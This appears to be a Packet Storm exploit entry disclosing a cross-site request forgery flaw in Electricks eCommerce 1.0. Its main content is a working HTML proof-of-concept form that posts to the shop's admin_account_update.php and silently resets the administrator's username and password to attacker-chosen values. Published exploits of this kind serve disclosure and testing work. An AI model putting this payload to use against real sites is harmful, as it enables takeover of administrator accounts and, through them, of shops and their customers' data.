Electricks eCommerce version 1.0 suffers from a cross site request forgery vulnerability.
0d7e8fb8424c8cfc85f770bef55ab554cb9654ecaf3d937cb78aec3e744be30f# Exploit Title: Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2018-11-12
# Exploit Author: Nawaf Alkeraithe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip
# Version: 1.0
#PoC:
i>>?<html><form enctype="application/x-www-form-urlencoded" method="POST"
action="
http://localhost/Electricks/Electricks/Electricks-shop/pages/admin_account_update.php"><table><tr><td>user_id</td><td><input
type="text" value="4" name="user_id"></td></tr>
<tr><td>firstname</td><td><input type="text" value="admin"
name="firstname"></td></tr>
<tr><td>lastname</td><td><input type="text" value="admin"
name="lastname"></td></tr>
<tr><td>email</td><td><input type="text" value="admin@admin.com"
name="email"></td></tr>
<tr><td>username</td><td><input type="text" value="admin"
name="username"></td></tr>
<tr><td>password</td><td><input type="text" value="NewPass"
name="password"></td></tr>
<tr><td>update</td><td><input type="text" value="" name="update"></td></tr>
</table><input type="submit" value="Change Admin Password"></form></html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed